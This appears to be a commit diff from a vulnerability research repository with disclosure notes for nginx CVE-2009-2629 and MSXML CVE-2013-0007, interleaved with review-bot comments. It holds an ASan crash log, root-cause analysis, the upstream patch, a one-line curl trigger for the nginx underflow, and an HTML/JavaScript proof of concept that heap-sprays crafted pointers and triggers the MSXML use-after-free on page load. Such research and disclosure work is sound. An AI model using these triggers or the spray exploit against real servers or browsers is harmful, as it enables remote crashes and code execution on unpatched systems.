Showing
116 changed files
with
15,806 additions
and
0 deletions.
@@ -0,0 +1,11 @@ | ||
# Disclosure Note | ||
|
||
CVE-2009-2629: nginx http module Buffer Underflow Remote Code Execution Vulnerability | ||
|
||
Awesome bug, one of a kind. A classical exploitable buffer underflow. Off-by-one in http parsing. Requires a non-standard configuration. Some servers on the Internet still have it (<1%) | ||
|
||
### Credits | ||
|
||
Vulnerability discovery: unknown | ||
Vulnerability analysis: Alisa Esage | ||
Proof of concept: Alisa Esage |
@@ -0,0 +1,3 @@ | ||
./configure --with-debug --with-cc-opt=-g -Wno-error -fsanitize=address --with-ld-opt=-fsanitize=address --prefix=/home/am/Test/nginx-0.8.14_asan --sbin-path=/home/am/Test/nginx-0.8.14_asan --conf-path=/home/am/Test/nginx-0.8.14_asan/nginx.conf --error-log-path=/home/am/Test/nginx-0.8.14_asan/error.log --http-log-path=/home/am/Test/nginx-0.8.14_asan/access.log --pid-path=/tmp/nginx-0.8.14_asan.pid --lock-path=/var/lock/nginx-0.8.14_asan.lock --with-pcre=/media/psf/Code/pcre-8.34 --with-zlib=/media/psf/Code/zlib-1.2.11 | ||
make && make install | ||
export ASAN_OPTIONS=detect_leaks=false |
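Review bot: The `--with-cc-opt` value on the `./configure` line is unquoted, so the shell splits it and only `-g` reaches that option while `-Wno-error` and `-fsanitize=address` are passed to configure as separate bare arguments, which nginx's configure is likely to reject rather than apply; it should read `--with-cc-opt="-g -Wno-error -fsanitize=address"`. The `--prefix`, `--with-pcre` and `--with-zlib` values are hard-coded to one machine's `/home/am/Test` and `/media/psf/Code` layout, so a leading comment such as `# adjust prefix and pcre/zlib source paths before running` would save anyone reproducing the ASan build a failed configure. `export ASAN_OPTIONS=detect_leaks=false` only affects the shell it runs in, so it presumably needs to precede launching the built binary from that same shell; stating that in a comment would help.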
@@ -0,0 +1,121 @@ | ||
|
||
#user nobody; | ||
worker_processes 1; | ||
|
||
#error_log logs/error.log; | ||
#error_log logs/error.log notice; | ||
#error_log logs/error.log info; | ||
|
||
#pid logs/nginx.pid; | ||
|
||
|
||
events { | ||
worker_connections 1024; | ||
} | ||
|
||
|
||
http { | ||
|
||
merge_slashes off; | ||
|
||
include mime.types; | ||
default_type application/octet-stream; | ||
|
||
#log_format main '$remote_addr - $remote_user [$time_local] "$request" ' | ||
# '$status $body_bytes_sent "$http_referer" ' | ||
# '"$http_user_agent" "$http_x_forwarded_for"'; | ||
|
||
#access_log logs/access.log main; | ||
|
||
sendfile on; | ||
#tcp_nopush on; | ||
|
||
#keepalive_timeout 0; | ||
keepalive_timeout 65; | ||
|
||
#gzip on; | ||
|
||
server { | ||
listen 80; | ||
server_name localhost; | ||
|
||
#charset koi8-r; | ||
|
||
#access_log logs/host.access.log main; | ||
|
||
location / { | ||
root html; | ||
index index.html index.htm; | ||
} | ||
|
||
#error_page 404 /404.html; | ||
|
||
# redirect server error pages to the static page /50x.html | ||
# | ||
error_page 500 502 503 504 /50x.html; | ||
location = /50x.html { | ||
root html; | ||
} | ||
|
||
# proxy the PHP scripts to Apache listening on 127.0.0.1:80 | ||
# | ||
#location ~ \.php$ { | ||
# proxy_pass http://127.0.0.1; | ||
#} | ||
|
||
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 | ||
# | ||
#location ~ \.php$ { | ||
# root html; | ||
# fastcgi_pass 127.0.0.1:9000; | ||
# fastcgi_index index.php; | ||
# fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; | ||
# include fastcgi_params; | ||
#} | ||
|
||
# deny access to .htaccess files, if Apache's document root | ||
# concurs with nginx's one | ||
# | ||
#location ~ /\.ht { | ||
# deny all; | ||
#} | ||
} | ||
|
||
|
||
# another virtual host using mix of IP-, name-, and port-based configuration | ||
# | ||
#server { | ||
# listen 8000; | ||
# listen somename:8080; | ||
# server_name somename alias another.alias; | ||
|
||
# location / { | ||
# root html; | ||
# index index.html index.htm; | ||
# } | ||
#} | ||
|
||
|
||
# HTTPS server | ||
# | ||
#server { | ||
# listen 443; | ||
# server_name localhost; | ||
|
||
# ssl on; | ||
# ssl_certificate cert.pem; | ||
# ssl_certificate_key cert.key; | ||
|
||
# ssl_session_timeout 5m; | ||
|
||
# ssl_protocols SSLv2 SSLv3 TLSv1; | ||
# ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP; | ||
# ssl_prefer_server_ciphers on; | ||
|
||
# location / { | ||
# root html; | ||
# index index.html index.htm; | ||
# } | ||
#} | ||
|
||
} |
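Review bot: `merge_slashes off;` directly under `http {` is the only departure from the stock configuration and, per the accompanying analysis note, the precondition for reaching the faulty `sw_dot_dot` path, yet the file does not say so; a reader diffing against a default nginx.conf cannot tell it is deliberate. Suggest `merge_slashes off;   # non-default on purpose: CVE-2009-2629 is only reachable with slash merging disabled (see notes)`. Separately, `listen 80;` in the `server` block needs a privileged bind, and the ASan log in this same commit records two `bind() to 0.0.0.0:80 failed (13: Permission denied)` attempts before the successful run; using an unprivileged port such as `listen 8080;` (and adjusting the curl command accordingly) would make the repro runnable without root.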
@@ -0,0 +1,58 @@ | ||
2018/11/14 00:06:36 [emerg] 6868#0: bind() to 0.0.0.0:80 failed (13: Permission denied) | ||
2018/11/14 00:07:22 [emerg] 6940#0: bind() to 0.0.0.0:80 failed (13: Permission denied) | ||
================================================================= | ||
==6950==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000b4ff at pc 0x555a74c419db bp 0x7ffdf6992480 sp 0x7ffdf6992478 | ||
READ of size 1 at 0x62100000b4ff thread T0 | ||
#0 0x555a74c419da in ngx_http_parse_complex_uri src/http/ngx_http_parse.c:1141 | ||
#1 0x555a74c3d56c in ngx_http_process_request_line src/http/ngx_http_request.c:731 | ||
#2 0x555a74c33540 in ngx_http_init_request src/http/ngx_http_request.c:513 | ||
#3 0x555a74c13f84 in ngx_epoll_process_events src/event/modules/ngx_epoll_module.c:642 | ||
#4 0x555a74bfb666 in ngx_process_events_and_timers src/event/ngx_event.c:245 | ||
#5 0x555a74c10231 in ngx_worker_process_cycle src/os/unix/ngx_process_cycle.c:781 | ||
#6 0x555a74c0bd78 in ngx_spawn_process src/os/unix/ngx_process.c:196 | ||
#7 0x555a74c0e1f1 in ngx_start_worker_processes src/os/unix/ngx_process_cycle.c:345 | ||
#8 0x555a74c11985 in ngx_master_process_cycle src/os/unix/ngx_process_cycle.c:136 | ||
#9 0x555a74bc1366 in main src/core/nginx.c:382 | ||
#10 0x7f94b9b7f2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0) | ||
#11 0x555a74bbed39 in _start (/home/am/Test/nginx-0.8.14_asan/nginx+0x3ad39) | ||
|
||
0x62100000b4ff is located 1 bytes to the left of 4096-byte region [0x62100000b500,0x62100000c500) | ||
allocated by thread T0 here: | ||
#0 0x7f94ba68ad28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28) | ||
#1 0x555a74c05f59 in ngx_alloc src/os/unix/ngx_alloc.c:21 | ||
|
||
SUMMARY: AddressSanitizer: heap-buffer-overflow src/http/ngx_http_parse.c:1141 in ngx_http_parse_complex_uri | ||
Shadow bytes around the buggy address: | ||
0x0c427fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
0x0c427fff9680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa | ||
=>0x0c427fff9690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] | ||
0x0c427fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
0x0c427fff96e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ||
Shadow byte legend (one shadow byte represents 8 application bytes): | ||
Addressable: 00 | ||
Partially addressable: 01 02 03 04 05 06 07 | ||
Heap left redzone: fa | ||
Heap right redzone: fb | ||
Freed heap region: fd | ||
Stack left redzone: f1 | ||
Stack mid redzone: f2 | ||
Stack right redzone: f3 | ||
Stack partial redzone: f4 | ||
Stack after return: f5 | ||
Stack use after scope: f8 | ||
Global redzone: f9 | ||
Global init order: f6 | ||
Poisoned by user: f7 | ||
Container overflow: fc | ||
Array cookie: ac | ||
Intra object redzone: bb | ||
ASan internal: fe | ||
Left alloca redzone: ca | ||
Right alloca redzone: cb | ||
==6950==ABORTING |
@@ -0,0 +1,20 @@ | ||
06.06.2019. Check if the merge_slashes directive is required | ||
|
||
ngx_http_parse_complex_uri: | ||
... | ||
case sw_dot_dot: | ||
... | ||
case '/': | ||
state = sw_slash; | ||
u -= 4; // <--------- culprit | ||
if (u < r->uri.data) { | ||
return NGX_HTTP_PARSE_INVALID_REQUEST; | ||
} | ||
while (*(u - 1) != '/') { | ||
u--; | ||
} | ||
|
||
`u` contains the URI. It must be 4+ characters long to pass the check < r->uri.data. If the URI always starts with a '/' (seems like it, but I didn't prove it), then it must be exactly 4 characters long: otherwise the loop will hit a slash and no underflow. | ||
|
||
If the merge_slashes directive is on (default), then there seems to be no way to make a 4-char URI without additional slashes. | ||
If the merge_slashes is off, then: //../ |
@@ -0,0 +1,26 @@ | ||
Index: src/http/ngx_http_parse.c | ||
=================================================================== | ||
--- src/http/ngx_http_parse.c (revision 2410) | ||
+++ src/http/ngx_http_parse.c (revision 2411) | ||
@@ -1134,11 +1134,15 @@ | ||
#endif | ||
case '/': | ||
state = sw_slash; | ||
- u -= 4; | ||
- if (u < r->uri.data) { | ||
- return NGX_HTTP_PARSE_INVALID_REQUEST; | ||
- } | ||
- while (*(u - 1) != '/') { | ||
+ u -= 5; | ||
+ for ( ;; ) { | ||
+ if (u < r->uri.data) { | ||
+ return NGX_HTTP_PARSE_INVALID_REQUEST; | ||
+ } | ||
+ if (*u == '/') { | ||
+ u++; | ||
+ break; | ||
+ } | ||
u--; | ||
} | ||
break; | ||
|
@@ -0,0 +1 @@ | ||
curl http://127.0.0.1//%2e%2e/asdf |
@@ -0,0 +1,11 @@ | ||
# Disclosure Note | ||
|
||
CVE-2013-0007: Microsoft XML Core Services 4-6 Use-after-free Vulnerability | ||
|
||
From my Phrack paper: [Exploiting Microsoft XML with misalignment and factorials](http://phrack.org/issues/69/10.html) (2015) | ||
|
||
### Credits | ||
|
||
Vulnerability discovery: Nicolas Grégoire | ||
Vulnerability analysis: Alisa Esage | ||
Proof of concept exploit: Alisa Esage |
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,89 @@ | ||
<!doctype html> | ||
<html> | ||
<head> | ||
|
||
<script> | ||
|
||
function crash() | ||
{ | ||
xslcontent='<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template name="main_template" match="/"><xsl:for-each select="*"><xsl:apply-templates/></xsl:for-each></xsl:template><xsl:template name="xx" match="x[position()]" /></xsl:stylesheet>'; | ||
|
||
srcTree=new ActiveXObject("Msxml2.DOMDocument.6.0"); | ||
xsltTree=new ActiveXObject("Msxml2.DOMDocument.6.0"); | ||
xsltTree.loadXML(xslcontent); | ||
alert("crash"); | ||
srcTree.transformNode(xsltTree); | ||
} | ||
|
||
function selfpatch() | ||
{ | ||
// !!! +hpa required !!! | ||
// bp msxml6!xengine::stns;bp msxml6!xengine::brns;g; | ||
|
||
var intArr = new Array; | ||
intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01 | ||
|
||
var count = (0x19000000-0x20)/4; // 400 Mb | ||
|
||
// ptr0(crashing)->ptr1->ptr2->shellcode // 0x3a..0x40.. -> 0x3838xxxx -> 0x3838yyyy -> patch or shellcode | ||
|
||
var pbyte = 0x38; // play with me | ||
var ptr12base = (pbyte<<24)+(pbyte<<16); //0x38380000 // landing for the initial memory access | ||
var ptr1 = 0; // calculated from the page offset | ||
var ptr2 = 0; // calculated from the page offset | ||
var ptrcall = 0x54545454; // 0x5454xxxx -> pointers to shellcode | ||
|
||
var delta = 0x3300; // added and removed to segregate the 1st and the 2nd memory access areas within the pattern | ||
// the additional bits above 0x1000 are used to enforce the successful 1-byte misaligned memory access | ||
|
||
for(var i=1; i<=count; i++) | ||
{ | ||
var i_pattern = i*4%0x1000; // index into the current page | ||
|
||
// let’s fill the spray tail with plain pointers to call | ||
if ( i>(0x12000000/4) ) // which defines where the ‘tail’ begins (chosen empirically) | ||
{ | ||
intArr[i] = 0x00badd1e; | ||
continue; | ||
} | ||
|
||
ptr1 = (i_pattern - 8 + 0x20 + delta); | ||
ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff)); | ||
|
||
// misaligned memory access: fallback to code exec | ||
if ( ((i*4+0x20)&0xff) == (pbyte+4) ) | ||
intArr[i] = ptrcall; | ||
|
||
// well aligned memory access: restore the pointers | ||
else if (i_pattern < 0x0700) | ||
intArr[i] = ptr12base + ptr1; | ||
else | ||
intArr[i] = ptr12base + ptr2; | ||
} | ||
|
||
crash(); | ||
alert("Look, no calc!"); | ||
} | ||
|
||
function factorial(n) | ||
{ | ||
if (n == 0) | ||
{ | ||
selfpatch(); | ||
return 1; | ||
} | ||
else | ||
return n * factorial(n - 1); | ||
} | ||
</script> | ||
</head> | ||
|
||
<body onload="factorial(30);"> | ||
<form id="a"> | ||
</form> | ||
<dfn id="b"> | ||
</dfn> | ||
<div id="resTree"></div> | ||
|
||
</body> | ||
</html> |